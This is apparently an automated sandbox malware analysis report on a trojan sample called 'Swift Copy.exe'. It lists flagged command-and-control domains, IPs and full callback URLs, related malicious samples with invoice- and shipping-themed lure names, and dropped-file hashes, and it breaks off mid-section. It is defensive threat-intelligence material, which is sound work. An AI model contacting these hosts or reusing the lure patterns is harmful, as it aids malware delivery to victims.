http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0	100%	Avira URL Cloud	malware
http://philiphanson.org/medius/book/1.0	0%	Avira URL Cloud	safe
http://www.kinemartigues.com/bwe0/	100%	Avira URL Cloud	malware
http://schemas.micr$	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.epic45.co.uk/bwe0/	100%	Avira URL Cloud	malware
www.my1245.com/bwe0/	100%	Avira URL Cloud	malware
http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==	100%	Avira URL Cloud	malware
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9	100%	Avira URL Cloud	malware
http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB	0%	Avira URL Cloud	safe
http://www.mogdento.com/bwe0/	100%	Avira URL Cloud	malware
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==	100%	Avira URL Cloud	malware
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.epic45.co.uk	103.67.235.120	true	true		unknown
www.posinet1.com	202.172.26.50	true	false		unknown
kinemartigues.com	51.159.175.169	true	true	1%, Virustotal, Browse	unknown
www.expectedclosure.one	192.3.130.2	true	true		unknown
mogdento.com	103.92.235.55	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	true		unknown
www.mogdento.com	unknown	unknown	true		unknown
www.kinemartigues.com	unknown	unknown	true		unknown
www.blackyaga.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0	true	Avira URL Cloud: malware	unknown
http://www.kinemartigues.com/bwe0/	true	Avira URL Cloud: malware	unknown
http://www.epic45.co.uk/bwe0/	true	Avira URL Cloud: malware	unknown
www.my1245.com/bwe0/	true	Avira URL Cloud: malware	low
http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==	true	Avira URL Cloud: malware	unknown
http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==	true	Avira URL Cloud: malware	unknown
http://www.mogdento.com/bwe0/	true	Avira URL Cloud: malware	unknown
http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://philiphanson.org/medius/book/1.0	Swift Copy.exe, ImUIYlbLTIh.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.micr$	explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers/?	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB	NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9	NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.carterandcone.coml	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB	NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.92.235.55	mogdento.com	India	138251	ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN	true
103.67.235.120	www.epic45.co.uk	Philippines	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
192.3.130.2	www.expectedclosure.one	United States	36352	AS-COLOCROSSINGUS	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
51.159.175.169	kinemartigues.com	France	12876	OnlineSASFR	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682145
Start date and time:	2022-08-11 06:27:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Swift Copy.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/9@6/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 89.5% (good quality ratio 78.3%) Quality average: 72% Quality standard deviation: 33.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 39 Number of non-executed functions: 164
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:28:14	API Interceptor	1x Sleep call for process: Swift Copy.exe modified
06:28:22	API Interceptor	44x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.92.235.55	Swift Copy.exe	Get hash	malicious	Browse	www.mogdento.com/bwe0/?-Zi=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==&fprD4=JDKlFf9p
	Swift Copy.exe	Get hash	malicious	Browse	www.mogdento.com/bwe0/?IzuXJt=g48X_THhKtPP8&XZmXTF=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==
	Invoice SIL-EDI-0-2022-392.exe	Get hash	malicious	Browse	www.mogdento.com/fn9h/?0B=YPsXr&u2M=NDcWEdKPoPt0GAFg9w0iV0N4RtIj4m+RboZ3rDvZCYaWmcLvU69kuueTKH5Y79UsALhFJEOMKN0BcGkULfT0vdwtiNkODwJH5g==
103.67.235.120	Swift Copy.exe	Get hash	malicious	Browse	www.epic45.co.uk/bwe0/?-Zi=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&fprD4=JDKlFf9p
	Swift Copy.exe	Get hash	malicious	Browse	www.epic45.co.uk/bwe0/?XZmXTF=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&IzuXJt=g48X_THhKtPP8
	ICM Player Offer.xlsx	Get hash	malicious	Browse	www.yakuru.online/uhq3/?c0G8lv=45dYrlNdHhVvM9AHuej+BeCdaS4+FC0zvSfibcwBlzcnO3ddVGvcOA7fuFEOtTwSHpddOQ==&SruD_0=RL0dNrU0nHkDvTc0
	BL6321474570.doc	Get hash	malicious	Browse	www.betterskincareco.com/k2i4/?6l=+A/74ObVi8O0S1Jyx3/tg+J+iqKOgvW4x/HkZIfUhlJJeP8GxPvVRrcR1moMZP8oIK6d0Q==&NDKd8P=mhflMlVP
	vsl_rfq01209800122.exe	Get hash	malicious	Browse	www.virginianundahfishingclub.com/igwa/?5jw=Rn5cWsUc3hsd8uzfvpWWDRdkJokqBH2nhnT1Xi49NcMYUR7u7E+iHVl+90bmUHkNO05x+Fm5Tg==&wJE=vxodvPl0
	QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exe	Get hash	malicious	Browse	www.fawadjafri.com/bus9/?R48tj=NMNiv1f4qewSqEArT5WjBOzgZiGy2no/QDtiya1+XaejoNPDoF/AR89+uEGmD8ZCPUvAc4Hm4A==&b6YP=LPhxwVCxpPOtkfq
	New order - C.S.I No. 0987.exe	Get hash	malicious	Browse	www.themetalsmithcollective.online/a1f7/?X2MLsnr=UvwhkPKCZCd1K0vmncplG+WlRat/mvdXhYv1Spcx7Wlw+kgVmmd6ISlg53KwKI27rax/&m0GlqH=4hL0fxLhav
	shipping Docs.pdf.exe	Get hash	malicious	Browse	www.themetalsmithcollective.online/a1f7/?5jup=9rIxCtlp7NSDpt&wHV=UvwhkPKCZCd1K0vmncplG+WlRat/mvdXhYv1Spcx7Wlw+kgVmmd6ISlg53KwKI27rax/
	Unpaid invoice.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?u6Ah1=6CHuhRUPjGwWXAVpS7zsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7LJ7yyKlf5td&2drLPh=3fsplh88DfDdR
	Proforma Invoices.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?8p=iTyHu&i8t=6CHuhRUK+B0TVQUTOrzsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7IJkx2uef6IZ
	document.exe	Get hash	malicious	Browse	www.juniperandboo.com/hue4/?3fut_=8j3Ii0glwjQb/Kx0DIJP8cx5E/ri4OSPeKO3mEeb0Ddcimj80m05ik5J+AMBKltxDdJK&r2=JL0h7PwP-XiDwJ3
	FzvFtf2XXK.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?7nwTnlOP=6CHuhRUK+B0TVQUTOrzsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7IJkx2uef6IZ&ER-=zPspTrDhV2tTc
	DEUXRWq2W8.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?ApO83=6CHuhRUPjGwWXAVpS7zsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7LJRtC6lb7ld&m6=yFQ0zfAHCxIp
	g1IjazIJQp.exe	Get hash	malicious	Browse	www.skincodedaesthetics.com/bckt/?f2JTg=zeCeGVR8KI59truqlmRteqXjRqqo2vcdTB/anSLMa+LvU/osSbptcO3QN0m6KMzXJsGb&6lRl=Knbdp6g8N6Y
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?_xllR=SL0l7NVxUdmdjv&7nlpd=6CHuhRUK+B0TVQUTOrzsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7IJkx2uef6IZ
	DUE PAYMENT.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?2dpPwJP=6CHuhRUK+B0TVQUTOrzsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7IJkx2uef6IZ&uN9=3fPH4rk8fd4xHD
	SOA.exe	Get hash	malicious	Browse	www.shobhajoshi.com/b2c0/?3ff=y6AT2b&m4C=6CHuhRUPjGwWXAVpS7zsdqmaS0UbWfnfJ9d5NvyoQWDOB+6YJz2VjqwN7LJ7yyKlf5td
	DHL Document. PDF.exe	Get hash	malicious	Browse	www.offgridoverlanding.com/d8ak/?Szr0s4=LaQxhnDC9XDSPIXf6a4PUl29eGLsK62F0Jvo6KKTBIsDTkRumoxno6R7Q+Fcew8mVqMcp/Kj2Q==&QL3=uTyTqJdh5XE07
	Purchase Enquiry.exe	Get hash	malicious	Browse	www.initiationpodcast.com/pep/?BrR=we3YJqdkAYa+/3VrXeTZiExtaHC+ZGgVohnMbIg7YHF0HtdOIc0YrWMXPGHoZANdKL2jByloaw==&nbm8EH=xPJtZrTpB
	BELZONA Specification.exe	Get hash	malicious	Browse	www.demoninmyattic.com/cbd/?BRA4Xrj=HNGziEAs61rKsJMfYJP9Jxk7qhBFb4kc2ZklXZN3KrMa8tcyMGJiFZ9DOVD8WM4qUzvG&EBZ=ZTFtdPbxGh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.posinet1.com	Swift Copy.exe	Get hash	malicious	Browse	202.172.26.50
www.posinet1.com	Swift Copy.exe	Get hash	malicious	Browse	202.172.26.250
natroredirect.natrocdn.com	Swift Copy.exe	Get hash	malicious	Browse	85.159.66.93
	Swift Copy.exe	Get hash	malicious	Browse	85.159.66.93
	BVCXB NEW ORDER.exe	Get hash	malicious	Browse	85.159.66.93
	statement of account.exe	Get hash	malicious	Browse	85.159.66.93
	DHL_FAKTURA.vbs	Get hash	malicious	Browse	85.159.66.93
	CMA_BKN_CONFIRMATION.vbs	Get hash	malicious	Browse	85.159.66.93
	STD 35 GA Plan_doc.exe	Get hash	malicious	Browse	85.159.66.93
	nAMQggsILS.exe	Get hash	malicious	Browse	85.159.66.93
	isf0mq3A6F.exe	Get hash	malicious	Browse	85.159.66.93
	A361cnVSmm.exe	Get hash	malicious	Browse	85.159.66.93
	ADvYUelVvZ.exe	Get hash	malicious	Browse	85.159.66.93
	heptene.exe	Get hash	malicious	Browse	85.159.66.93
	word_document.doc	Get hash	malicious	Browse	85.159.66.93
	Purchase Order No. 917240406AA.exe	Get hash	malicious	Browse	85.159.66.93
	m16h7WmaNB.exe	Get hash	malicious	Browse	85.159.66.93
	CIQ-PO162688.js	Get hash	malicious	Browse	85.159.66.93
	CIQ-PO162667.js	Get hash	malicious	Browse	85.159.66.93
	ORDER LIST 011405.exe	Get hash	malicious	Browse	85.159.66.93
	Nr_SC0551923.js	Get hash	malicious	Browse	85.159.66.93
	Conpamy Profile.exe	Get hash	malicious	Browse	85.159.66.93
www.expectedclosure.one	Swift Copy.exe	Get hash	malicious	Browse	192.3.130.2
	Swift Copy.exe	Get hash	malicious	Browse	192.3.130.2
	statement of account.exe	Get hash	malicious	Browse	192.3.130.2
www.epic45.co.uk	Swift Copy.exe	Get hash	malicious	Browse	103.67.235.120
	Swift Copy.exe	Get hash	malicious	Browse	103.67.235.120
	statement of account.exe	Get hash	malicious	Browse	103.67.235.120

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	Swift Copy.exe	Get hash	malicious	Browse	103.67.235.120
	Swift Copy.exe	Get hash	malicious	Browse	103.67.235.120
	CDXkaVYU19.exe	Get hash	malicious	Browse	203.170.80.250
	t6bwEs3d5W.exe	Get hash	malicious	Browse	203.170.80.250
	FEDEX_SHIPMENT.vbs	Get hash	malicious	Browse	203.170.86.89
	PO.exe	Get hash	malicious	Browse	203.170.87.169
	Bestellanfrage - 93816 - 27.07.22.exe	Get hash	malicious	Browse	203.170.80.250
	DHL_FAKTURA.vbs	Get hash	malicious	Browse	203.170.86.89
	List of Items to Purchase.exe	Get hash	malicious	Browse	203.170.80.253
	VSyjQOmuhc.dll	Get hash	malicious	Browse	103.67.235.214
	Unhonoured.com	Get hash	malicious	Browse	203.170.80.250
	Booking_Confirmation.vbs	Get hash	malicious	Browse	203.170.86.89
	0lSsS1Iqya.exe	Get hash	malicious	Browse	203.170.80.250
	wTcqKKXreW.dll	Get hash	malicious	Browse	27.54.89.58
	EXFZCd3tg9.exe	Get hash	malicious	Browse	203.170.80.250
	Fedex_Shipment_Notification_Held_Shipment.vbs	Get hash	malicious	Browse	203.170.86.89
	Fedex_Notification_Shipment_Held.vbs	Get hash	malicious	Browse	203.170.86.89
	CMA_BKN_CONFIRMATION.vbs	Get hash	malicious	Browse	203.170.86.89
	Merskum.com	Get hash	malicious	Browse	203.170.80.250
	KR01769035_BOOKING.vbs	Get hash	malicious	Browse	203.170.86.89
ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN	Swift Copy.exe	Get hash	malicious	Browse	103.92.235.55
	Swift Copy.exe	Get hash	malicious	Browse	103.92.235.55
	Invoice SIL-EDI-0-2022-392.exe	Get hash	malicious	Browse	103.92.235.55
	https://googleweblight.com/i?u=https://storageapi.fleek.co/f898fa0c-1b8c-4b3a-ae09-58cd15bfa8ef-bucket/api/index.html?submit=david.cantrell@southside.com	Get hash	malicious	Browse	103.92.235.9
	virement file gfx256.exe	Get hash	malicious	Browse	103.93.16.21
	COMMANDE2022.exe	Get hash	malicious	Browse	103.93.16.21
	Untitled 0912.xlsm	Get hash	malicious	Browse	103.93.16.160
	Data_01516.xlsm	Get hash	malicious	Browse	103.93.16.160
	po.exe	Get hash	malicious	Browse	103.83.81.254
	HSBC payment Advise.xlsm	Get hash	malicious	Browse	103.92.235.85
	HSBC payment Advise.xlsm	Get hash	malicious	Browse	103.92.235.85
	C86HcKTYgD.exe	Get hash	malicious	Browse	103.92.235.85
	w0WaOVZDuU.exe	Get hash	malicious	Browse	103.92.235.85
	gunzipped.exe	Get hash	malicious	Browse	103.92.235.85
	gunzipped.exe	Get hash	malicious	Browse	103.92.235.85
	gunzipped.exe	Get hash	malicious	Browse	103.92.235.85
	payment advice.exe	Get hash	malicious	Browse	103.93.17.162
	OUTSTANDING_INV_Statement_934737.xls	Get hash	malicious	Browse	103.83.81.81
	Payment_Receipt 1726.xls	Get hash	malicious	Browse	103.83.81.144

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift Copy.exe.log

Download File

Process:	C:\Users\user\Desktop\Swift Copy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22240
Entropy (8bit):	5.6028719789255295
Encrypted:	false
SSDEEP:	384:BjtCDLq0wase0vaYS0nkjultIti7Y9gNSJ3xS1BMrmLZ1AV7t/JQ64I+iaY:BOeTTkCltS2NcRa4uo
MD5:	7A7867EA62542FC6B21D374EB056D454
SHA1:	C5683AEABF7D5E9DFD8DCA8FCD2EBBFC07F5E935
SHA-256:	620940C797B65CD49D883B943193907DA9E16C40473F957D80137136442155A5
SHA-512:	2EB8C8BA5F3609F1F9BBD690664000C21519B33098150E55BD15F47A50503F96F8C2F13481F271D29F94D36667E2AAFDADB27B774FFE9FF33897053BEE1AD4FE
Malicious:	false
Preview:	@...e...........p...................A.X..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\77824-68

Download File

Process:	C:\Windows\SysWOW64\NETSTAT.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
